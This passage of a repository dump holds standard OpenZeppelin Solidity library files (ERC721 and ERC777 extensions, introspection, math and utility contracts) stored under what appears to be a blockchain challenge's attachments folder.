16 | * 17 | * Requirements: 18 | * 19 | * - The caller must own `tokenId` or be an approved operator. 20 | */ 21 | function burn(uint256 tokenId) public virtual { 22 | //solhint-disable-next-line max-line-length 23 | require(_isApprovedOrOwner(_msgSender(), tokenId), "ERC721Burnable: caller is not owner nor approved"); 24 | _burn(tokenId); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/extensions/ERC721Pausable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/ERC721Pausable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC721.sol"; 7 | import "../../../security/Pausable.sol"; 8 | 9 | /** 10 | * @dev ERC721 token with pausable token transfers, minting and burning. 11 | * 12 | * Useful for scenarios such as preventing trades until the end of an evaluation 13 | * period, or having an emergency switch for freezing all token transfers in the 14 | * event of a large bug. 15 | */ 16 | abstract contract ERC721Pausable is ERC721, Pausable { 17 | /** 18 | * @dev See {ERC721-_beforeTokenTransfer}. 19 | * 20 | * Requirements: 21 | * 22 | * - the contract must not be paused. 
23 | */ 24 | function _beforeTokenTransfer( 25 | address from, 26 | address to, 27 | uint256 tokenId 28 | ) internal virtual override { 29 | super._beforeTokenTransfer(from, to, tokenId); 30 | 31 | require(!paused(), "ERC721Pausable: token transfer while paused"); 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/extensions/ERC721Royalty.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/ERC721Royalty.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC721.sol"; 7 | import "../../common/ERC2981.sol"; 8 | import "../../../utils/introspection/ERC165.sol"; 9 | 10 | /** 11 | * @dev Extension of ERC721 with the ERC2981 NFT Royalty Standard, a standardized way to retrieve royalty payment 12 | * information. 13 | * 14 | * Royalty information can be specified globally for all token ids via {_setDefaultRoyalty}, and/or individually for 15 | * specific token ids via {_setTokenRoyalty}. The latter takes precedence over the first. 16 | * 17 | * IMPORTANT: ERC-2981 only specifies a way to signal royalty information and does not enforce its payment. See 18 | * https://eips.ethereum.org/EIPS/eip-2981#optional-royalty-payments[Rationale] in the EIP. Marketplaces are expected to 19 | * voluntarily pay royalties together with sales, but note that this standard is not yet widely supported. 20 | * 21 | * _Available since v4.5._ 22 | */ 23 | abstract contract ERC721Royalty is ERC2981, ERC721 { 24 | /** 25 | * @dev See {IERC165-supportsInterface}. 26 | */ 27 | function supportsInterface(bytes4 interfaceId) public view virtual override(ERC721, ERC2981) returns (bool) { 28 | return super.supportsInterface(interfaceId); 29 | } 30 | 31 | /** 32 | * @dev See {ERC721-_burn}. This override additionally clears the royalty information for the token. 
33 | */ 34 | function _burn(uint256 tokenId) internal virtual override { 35 | super._burn(tokenId); 36 | _resetTokenRoyalty(tokenId); 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/extensions/IERC721Enumerable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../IERC721.sol"; 7 | 8 | /** 9 | * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension 10 | * @dev See https://eips.ethereum.org/EIPS/eip-721 11 | */ 12 | interface IERC721Enumerable is IERC721 { 13 | /** 14 | * @dev Returns the total amount of tokens stored by the contract. 15 | */ 16 | function totalSupply() external view returns (uint256); 17 | 18 | /** 19 | * @dev Returns a token ID owned by `owner` at a given `index` of its token list. 20 | * Use along with {balanceOf} to enumerate all of ``owner``'s tokens. 21 | */ 22 | function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256); 23 | 24 | /** 25 | * @dev Returns a token ID at a given `index` of all the tokens stored by the contract. 26 | * Use along with {totalSupply} to enumerate all tokens. 
27 | */ 28 | function tokenByIndex(uint256 index) external view returns (uint256); 29 | } 30 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/extensions/IERC721Metadata.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../IERC721.sol"; 7 | 8 | /** 9 | * @title ERC-721 Non-Fungible Token Standard, optional metadata extension 10 | * @dev See https://eips.ethereum.org/EIPS/eip-721 11 | */ 12 | interface IERC721Metadata is IERC721 { 13 | /** 14 | * @dev Returns the token collection name. 15 | */ 16 | function name() external view returns (string memory); 17 | 18 | /** 19 | * @dev Returns the token collection symbol. 20 | */ 21 | function symbol() external view returns (string memory); 22 | 23 | /** 24 | * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token. 25 | */ 26 | function tokenURI(uint256 tokenId) external view returns (string memory); 27 | } 28 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/extensions/draft-ERC721Votes.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/extensions/draft-ERC721Votes.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC721.sol"; 7 | import "../../../governance/utils/Votes.sol"; 8 | 9 | /** 10 | * @dev Extension of ERC721 to support voting and delegation as implemented by {Votes}, where each individual NFT counts 11 | * as 1 vote unit. 12 | * 13 | * Tokens do not count as votes until they are delegated, because votes must be tracked which incurs an additional cost 14 | * on every transfer. 
Token holders can either delegate to a trusted representative who will decide how to make use of 15 | * the votes in governance decisions, or they can delegate to themselves to be their own representative. 16 | * 17 | * _Available since v4.5._ 18 | */ 19 | abstract contract ERC721Votes is ERC721, Votes { 20 | /** 21 | * @dev Adjusts votes when tokens are transferred. 22 | * 23 | * Emits a {Votes-DelegateVotesChanged} event. 24 | */ 25 | function _afterTokenTransfer( 26 | address from, 27 | address to, 28 | uint256 tokenId 29 | ) internal virtual override { 30 | _transferVotingUnits(from, to, 1); 31 | super._afterTokenTransfer(from, to, tokenId); 32 | } 33 | 34 | /** 35 | * @dev Returns the balance of `account`. 36 | */ 37 | function _getVotingUnits(address account) internal view virtual override returns (uint256) { 38 | return balanceOf(account); 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/presets/README.md: -------------------------------------------------------------------------------- 1 | Contract presets are now deprecated in favor of [Contracts Wizard](https://wizard.openzeppelin.com/) as a more powerful alternative. 2 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/utils/ERC721Holder.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC721/utils/ERC721Holder.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../IERC721Receiver.sol"; 7 | 8 | /** 9 | * @dev Implementation of the {IERC721Receiver} interface. 10 | * 11 | * Accepts all token transfers. 12 | * Make sure the contract is able to use its token with {IERC721-safeTransferFrom}, {IERC721-approve} or {IERC721-setApprovalForAll}. 
13 | */ 14 | contract ERC721Holder is IERC721Receiver { 15 | /** 16 | * @dev See {IERC721Receiver-onERC721Received}. 17 | * 18 | * Always returns `IERC721Receiver.onERC721Received.selector`. 19 | */ 20 | function onERC721Received( 21 | address, 22 | address, 23 | uint256, 24 | bytes memory 25 | ) public virtual override returns (bytes4) { 26 | return this.onERC721Received.selector; 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC777/IERC777Recipient.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC777/IERC777Recipient.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Interface of the ERC777TokensRecipient standard as defined in the EIP. 8 | * 9 | * Accounts can be notified of {IERC777} tokens being sent to them by having a 10 | * contract implement this interface (contract holders can be their own 11 | * implementer) and registering it on the 12 | * https://eips.ethereum.org/EIPS/eip-1820[ERC1820 global registry]. 13 | * 14 | * See {IERC1820Registry} and {ERC1820Implementer}. 15 | */ 16 | interface IERC777Recipient { 17 | /** 18 | * @dev Called by an {IERC777} token contract whenever tokens are being 19 | * moved or created into a registered account (`to`). The type of operation 20 | * is conveyed by `from` being the zero address or not. 21 | * 22 | * This call occurs _after_ the token contract's state is updated, so 23 | * {IERC777-balanceOf}, etc., can be used to query the post-operation state. 24 | * 25 | * This function may revert to prevent the operation from being executed. 
26 | */ 27 | function tokensReceived( 28 | address operator, 29 | address from, 30 | address to, 31 | uint256 amount, 32 | bytes calldata userData, 33 | bytes calldata operatorData 34 | ) external; 35 | } 36 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC777/IERC777Sender.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC777/IERC777Sender.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Interface of the ERC777TokensSender standard as defined in the EIP. 8 | * 9 | * {IERC777} Token holders can be notified of operations performed on their 10 | * tokens by having a contract implement this interface (contract holders can be 11 | * their own implementer) and registering it on the 12 | * https://eips.ethereum.org/EIPS/eip-1820[ERC1820 global registry]. 13 | * 14 | * See {IERC1820Registry} and {ERC1820Implementer}. 15 | */ 16 | interface IERC777Sender { 17 | /** 18 | * @dev Called by an {IERC777} token contract whenever a registered holder's 19 | * (`from`) tokens are about to be moved or destroyed. The type of operation 20 | * is conveyed by `to` being the zero address or not. 21 | * 22 | * This call occurs _before_ the token contract's state is updated, so 23 | * {IERC777-balanceOf}, etc., can be used to query the pre-operation state. 24 | * 25 | * This function may revert to prevent the operation from being executed. 
26 | */ 27 | function tokensToSend( 28 | address operator, 29 | address from, 30 | address to, 31 | uint256 amount, 32 | bytes calldata userData, 33 | bytes calldata operatorData 34 | ) external; 35 | } 36 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC777/README.adoc: -------------------------------------------------------------------------------- 1 | = ERC 777 2 | 3 | [.readme-notice] 4 | NOTE: This document is better viewed at https://docs.openzeppelin.com/contracts/api/token/erc777 5 | 6 | This set of interfaces and contracts are all related to the [ERC777 token standard](https://eips.ethereum.org/EIPS/eip-777). 7 | 8 | TIP: For an overview of ERC777 tokens and a walk through on how to create a token contract read our xref:ROOT:erc777.adoc[ERC777 guide]. 9 | 10 | The token behavior itself is implemented in the core contracts: {IERC777}, {ERC777}. 11 | 12 | Additionally there are interfaces used to develop contracts that react to token movements: {IERC777Sender}, {IERC777Recipient}. 13 | 14 | == Core 15 | 16 | {{IERC777}} 17 | 18 | {{ERC777}} 19 | 20 | == Hooks 21 | 22 | {{IERC777Sender}} 23 | 24 | {{IERC777Recipient}} 25 | 26 | == Presets 27 | 28 | These contracts are preconfigured combinations of features. They can be used through inheritance or as models to copy and paste their source code. 
29 | 30 | {{ERC777PresetFixedSupply}} 31 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC777/presets/ERC777PresetFixedSupply.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC777/presets/ERC777PresetFixedSupply.sol) 3 | pragma solidity ^0.8.0; 4 | 5 | import "../ERC777.sol"; 6 | 7 | /** 8 | * @dev {ERC777} token, including: 9 | * 10 | * - Preminted initial supply 11 | * - No access control mechanism (for minting/pausing) and hence no governance 12 | * 13 | * _Available since v3.4._ 14 | */ 15 | contract ERC777PresetFixedSupply is ERC777 { 16 | /** 17 | * @dev Mints `initialSupply` amount of token and transfers them to `owner`. 18 | * 19 | * See {ERC777-constructor}. 20 | */ 21 | constructor( 22 | string memory name, 23 | string memory symbol, 24 | address[] memory defaultOperators, 25 | uint256 initialSupply, 26 | address owner 27 | ) ERC777(name, symbol, defaultOperators) { 28 | _mint(owner, initialSupply, "", ""); 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/common/README.adoc: -------------------------------------------------------------------------------- 1 | = Common (Tokens) 2 | 3 | Functionality that is common to multiple token standards. 4 | 5 | * {ERC2981}: NFT Royalties compatible with both ERC721 and ERC1155. 6 | ** For ERC721 consider {ERC721Royalty} which clears the royalty information from storage on burn. 
7 | 8 | == Contracts 9 | 10 | {{ERC2981}} 11 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/Arrays.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/Arrays.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./math/Math.sol"; 7 | 8 | /** 9 | * @dev Collection of functions related to array types. 10 | */ 11 | library Arrays { 12 | /** 13 | * @dev Searches a sorted `array` and returns the first index that contains 14 | * a value greater or equal to `element`. If no such index exists (i.e. all 15 | * values in the array are strictly less than `element`), the array length is 16 | * returned. Time complexity O(log n). 17 | * 18 | * `array` is expected to be sorted in ascending order, and to contain no 19 | * repeated elements. 20 | */ 21 | function findUpperBound(uint256[] storage array, uint256 element) internal view returns (uint256) { 22 | if (array.length == 0) { 23 | return 0; 24 | } 25 | 26 | uint256 low = 0; 27 | uint256 high = array.length; 28 | 29 | while (low < high) { 30 | uint256 mid = Math.average(low, high); 31 | 32 | // Note that mid will always be strictly less than high (i.e. it will be a valid array index) 33 | // because Math.average rounds down (it does integer division with truncation). 34 | if (array[mid] > element) { 35 | high = mid; 36 | } else { 37 | low = mid + 1; 38 | } 39 | } 40 | 41 | // At this point `low` is the exclusive upper bound. We will return the inclusive upper bound. 
42 | if (low > 0 && array[low - 1] == element) { 43 | return low - 1; 44 | } else { 45 | return low; 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/Context.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Provides information about the current execution context, including the 8 | * sender of the transaction and its data. While these are generally available 9 | * via msg.sender and msg.data, they should not be accessed in such a direct 10 | * manner, since when dealing with meta-transactions the account sending and 11 | * paying for execution may not be the actual sender (as far as an application 12 | * is concerned). 13 | * 14 | * This contract is only required for intermediate, library-like contracts. 15 | */ 16 | abstract contract Context { 17 | function _msgSender() internal view virtual returns (address) { 18 | return msg.sender; 19 | } 20 | 21 | function _msgData() internal view virtual returns (bytes calldata) { 22 | return msg.data; 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/Counters.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/Counters.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @title Counters 8 | * @author Matt Condon (@shrugs) 9 | * @dev Provides counters that can only be incremented, decremented or reset. This can be used e.g. to track the number 10 | * of elements in a mapping, issuing ERC721 ids, or counting request ids. 
11 | * 12 | * Include with `using Counters for Counters.Counter;` 13 | */ 14 | library Counters { 15 | struct Counter { 16 | // This variable should never be directly accessed by users of the library: interactions must be restricted to 17 | // the library's function. As of Solidity v0.5.2, this cannot be enforced, though there is a proposal to add 18 | // this feature: see https://github.com/ethereum/solidity/issues/4637 19 | uint256 _value; // default: 0 20 | } 21 | /// @dev Returns the value currently stored in `counter`. 22 | function current(Counter storage counter) internal view returns (uint256) { 23 | return counter._value; 24 | } 25 | /// @dev Adds 1 to `counter`. The addition sits in an `unchecked` block, so it is not overflow-checked. 26 | function increment(Counter storage counter) internal { 27 | unchecked { 28 | counter._value += 1; 29 | } 30 | } 31 | /// @dev Subtracts 1 from `counter`; reverts with "Counter: decrement overflow" when the stored value is 0. 32 | function decrement(Counter storage counter) internal { 33 | uint256 value = counter._value; 34 | require(value > 0, "Counter: decrement overflow"); 35 | unchecked { 36 | counter._value = value - 1; 37 | } 38 | } 39 | /// @dev Sets `counter` back to 0. 40 | function reset(Counter storage counter) internal { 41 | counter._value = 0; 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/Multicall.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (utils/Multicall.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./Address.sol"; 7 | 8 | /** 9 | * @dev Provides a function to batch together multiple calls in a single external call. 10 | * 11 | * _Available since v4.1._ 12 | */ 13 | abstract contract Multicall { 14 | /** 15 | * @dev Receives and executes a batch of function calls on this contract. Each element of `data` is passed to `Address.functionDelegateCall` with `address(this)` as the target (see the loop body), i.e. the batch re-enters this contract's own functions; assuming the helper performs a plain delegatecall (Address.sol is not shown here), every sub-call keeps the original `msg.sender`. NOTE(review): inheriting contracts should confirm that each externally callable function stays safe when invoked several times inside one transaction. 
16 | */ 17 | function multicall(bytes[] calldata data) external virtual returns (bytes[] memory results) { 18 | results = new bytes[](data.length); 19 | for (uint256 i = 0; i < data.length; i++) { 20 | results[i] = Address.functionDelegateCall(address(this), data[i]); 21 | } 22 | return results; 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/escrow/ConditionalEscrow.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/escrow/ConditionalEscrow.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./Escrow.sol"; 7 | 8 | /** 9 | * @title ConditionalEscrow 10 | * @dev Base abstract escrow to only allow withdrawal if a condition is met. 11 | * @dev Intended usage: See {Escrow}. Same usage guidelines apply here. 12 | */ 13 | abstract contract ConditionalEscrow is Escrow { 14 | /** 15 | * @dev Returns whether an address is allowed to withdraw their funds. To be 16 | * implemented by derived contracts. 17 | * @param payee The destination address of the funds. 18 | */ 19 | function withdrawalAllowed(address payee) public view virtual returns (bool); 20 | 21 | function withdraw(address payable payee) public virtual override { 22 | require(withdrawalAllowed(payee), "ConditionalEscrow: payee is not allowed to withdraw"); 23 | super.withdraw(payee); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/introspection/ERC165.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./IERC165.sol"; 7 | 8 | /** 9 | * @dev Implementation of the {IERC165} interface. 
10 | * 11 | * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check 12 | * for the additional interface id that will be supported. For example: 13 | * 14 | * ```solidity 15 | * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { 16 | * return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId); 17 | * } 18 | * ``` 19 | * 20 | * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation. 21 | */ 22 | abstract contract ERC165 is IERC165 { 23 | /** 24 | * @dev See {IERC165-supportsInterface}. 25 | */ 26 | function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { 27 | return interfaceId == type(IERC165).interfaceId; 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/introspection/ERC165Storage.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165Storage.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./ERC165.sol"; 7 | 8 | /** 9 | * @dev Storage based implementation of the {IERC165} interface. 10 | * 11 | * Contracts may inherit from this and call {_registerInterface} to declare 12 | * their support of an interface. 13 | */ 14 | abstract contract ERC165Storage is ERC165 { 15 | /** 16 | * @dev Mapping of interface ids to whether or not it's supported. 17 | */ 18 | mapping(bytes4 => bool) private _supportedInterfaces; 19 | 20 | /** 21 | * @dev See {IERC165-supportsInterface}. 
22 | */ 23 | function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { 24 | return super.supportsInterface(interfaceId) || _supportedInterfaces[interfaceId]; 25 | } 26 | 27 | /** 28 | * @dev Registers the contract as an implementer of the interface defined by 29 | * `interfaceId`. Support of the actual ERC165 interface is automatic and 30 | * registering its interface id is not required. 31 | * 32 | * See {IERC165-supportsInterface}. 33 | * 34 | * Requirements: 35 | * 36 | * - `interfaceId` cannot be the ERC165 invalid interface (`0xffffffff`). 37 | */ 38 | function _registerInterface(bytes4 interfaceId) internal virtual { 39 | require(interfaceId != 0xffffffff, "ERC165: invalid interface id"); 40 | _supportedInterfaces[interfaceId] = true; 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/introspection/ERC1820Implementer.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC1820Implementer.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./IERC1820Implementer.sol"; 7 | 8 | /** 9 | * @dev Implementation of the {IERC1820Implementer} interface. 10 | * 11 | * Contracts may inherit from this and call {_registerInterfaceForAddress} to 12 | * declare their willingness to be implementers. 13 | * {IERC1820Registry-setInterfaceImplementer} should then be called for the 14 | * registration to be complete. 15 | */ 16 | contract ERC1820Implementer is IERC1820Implementer { 17 | bytes32 private constant _ERC1820_ACCEPT_MAGIC = keccak256("ERC1820_ACCEPT_MAGIC"); 18 | 19 | mapping(bytes32 => mapping(address => bool)) private _supportedInterfaces; 20 | 21 | /** 22 | * @dev See {IERC1820Implementer-canImplementInterfaceForAddress}. 
23 | */ 24 | function canImplementInterfaceForAddress(bytes32 interfaceHash, address account) 25 | public 26 | view 27 | virtual 28 | override 29 | returns (bytes32) 30 | { 31 | return _supportedInterfaces[interfaceHash][account] ? _ERC1820_ACCEPT_MAGIC : bytes32(0x00); 32 | } 33 | 34 | /** 35 | * @dev Declares the contract as willing to be an implementer of 36 | * `interfaceHash` for `account`. 37 | * 38 | * See {IERC1820Registry-setInterfaceImplementer} and 39 | * {IERC1820Registry-interfaceHash}. 40 | */ 41 | function _registerInterfaceForAddress(bytes32 interfaceHash, address account) internal virtual { 42 | _supportedInterfaces[interfaceHash][account] = true; 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/introspection/IERC165.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Interface of the ERC165 standard, as defined in the 8 | * https://eips.ethereum.org/EIPS/eip-165[EIP]. 9 | * 10 | * Implementers can declare support of contract interfaces, which can then be 11 | * queried by others ({ERC165Checker}). 12 | * 13 | * For an implementation, see {ERC165}. 14 | */ 15 | interface IERC165 { 16 | /** 17 | * @dev Returns true if this contract implements the interface defined by 18 | * `interfaceId`. See the corresponding 19 | * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section] 20 | * to learn more about how these ids are created. 21 | * 22 | * This function call must use less than 30 000 gas. 
23 | */ 24 | function supportsInterface(bytes4 interfaceId) external view returns (bool); 25 | } 26 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/introspection/IERC1820Implementer.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC1820Implementer.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Interface for an ERC1820 implementer, as defined in the 8 | * https://eips.ethereum.org/EIPS/eip-1820#interface-implementation-erc1820implementerinterface[EIP]. 9 | * Used by contracts that will be registered as implementers in the 10 | * {IERC1820Registry}. 11 | */ 12 | interface IERC1820Implementer { 13 | /** 14 | * @dev Returns a special value (`ERC1820_ACCEPT_MAGIC`) if this contract 15 | * implements `interfaceHash` for `account`. 16 | * 17 | * See {IERC1820Registry-setInterfaceImplementer}. 18 | */ 19 | function canImplementInterfaceForAddress(bytes32 interfaceHash, address account) external view returns (bytes32); 20 | } 21 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/math/Math.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (utils/math/Math.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Standard math utilities missing in the Solidity language. 8 | */ 9 | library Math { 10 | /** 11 | * @dev Returns the largest of two numbers. 12 | */ 13 | function max(uint256 a, uint256 b) internal pure returns (uint256) { 14 | return a >= b ? a : b; 15 | } 16 | 17 | /** 18 | * @dev Returns the smallest of two numbers. 19 | */ 20 | function min(uint256 a, uint256 b) internal pure returns (uint256) { 21 | return a < b ? 
a : b; 22 | } 23 | 24 | /** 25 | * @dev Returns the average of two numbers. The result is rounded towards 26 | * zero. 27 | */ 28 | function average(uint256 a, uint256 b) internal pure returns (uint256) { 29 | // (a + b) / 2 can overflow. 30 | return (a & b) + (a ^ b) / 2; 31 | } 32 | 33 | /** 34 | * @dev Returns the ceiling of the division of two numbers. 35 | * 36 | * This differs from standard division with `/` in that it rounds up instead 37 | * of rounding down. 38 | */ 39 | function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256) { 40 | // (a + b - 1) / b can overflow on addition, so we distribute. 41 | return a / b + (a % b == 0 ? 0 : 1); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/math/SignedMath.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (utils/math/SignedMath.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Standard signed math utilities missing in the Solidity language. 8 | */ 9 | library SignedMath { 10 | /** 11 | * @dev Returns the largest of two signed numbers. 12 | */ 13 | function max(int256 a, int256 b) internal pure returns (int256) { 14 | return a >= b ? a : b; 15 | } 16 | 17 | /** 18 | * @dev Returns the smallest of two signed numbers. 19 | */ 20 | function min(int256 a, int256 b) internal pure returns (int256) { 21 | return a < b ? a : b; 22 | } 23 | 24 | /** 25 | * @dev Returns the average of two signed numbers without overflow. 26 | * The result is rounded towards zero. 27 | */ 28 | function average(int256 a, int256 b) internal pure returns (int256) { 29 | // Formula from the book "Hacker's Delight" 30 | int256 x = (a & b) + ((a ^ b) >> 1); 31 | return x + (int256(uint256(x) >> 255) & (a ^ b)); 32 | } 33 | 34 | /** 35 | * @dev Returns the absolute unsigned value of a signed value. 
36 | */ 37 | function abs(int256 n) internal pure returns (uint256) { 38 | unchecked { 39 | // must be unchecked in order to support `n = type(int256).min` 40 | return uint256(n >= 0 ? n : -n); 41 | } 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/utils/structs/BitMaps.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (utils/structs/BitMaps.sol) 3 | pragma solidity ^0.8.0; 4 | 5 | /** 6 | * @dev Library for managing uint256 to bool mapping in a compact and efficient way, providing the keys are sequential. 7 | * Largely inspired by Uniswap's https://github.com/Uniswap/merkle-distributor/blob/master/contracts/MerkleDistributor.sol[merkle-distributor]. 8 | */ 9 | library BitMaps { 10 | struct BitMap { 11 | mapping(uint256 => uint256) _data; 12 | } 13 | // Each `_data` entry packs 256 flags: `index >> 8` selects the entry and `index & 0xff` the bit inside it. 14 | /** 15 | * @dev Returns whether the bit at `index` is set. 16 | */ 17 | function get(BitMap storage bitmap, uint256 index) internal view returns (bool) { 18 | uint256 bucket = index >> 8; 19 | uint256 mask = 1 << (index & 0xff); 20 | return bitmap._data[bucket] & mask != 0; 21 | } 22 | 23 | /** 24 | * @dev Sets the bit at `index` to the boolean `value`. 25 | */ 26 | function setTo( 27 | BitMap storage bitmap, 28 | uint256 index, 29 | bool value 30 | ) internal { 31 | if (value) { 32 | set(bitmap, index); 33 | } else { 34 | unset(bitmap, index); 35 | } 36 | } 37 | 38 | /** 39 | * @dev Sets the bit at `index`. 40 | */ 41 | function set(BitMap storage bitmap, uint256 index) internal { 42 | uint256 bucket = index >> 8; 43 | uint256 mask = 1 << (index & 0xff); 44 | bitmap._data[bucket] |= mask; 45 | } 46 | 47 | /** 48 | * @dev Unsets the bit at `index`. 
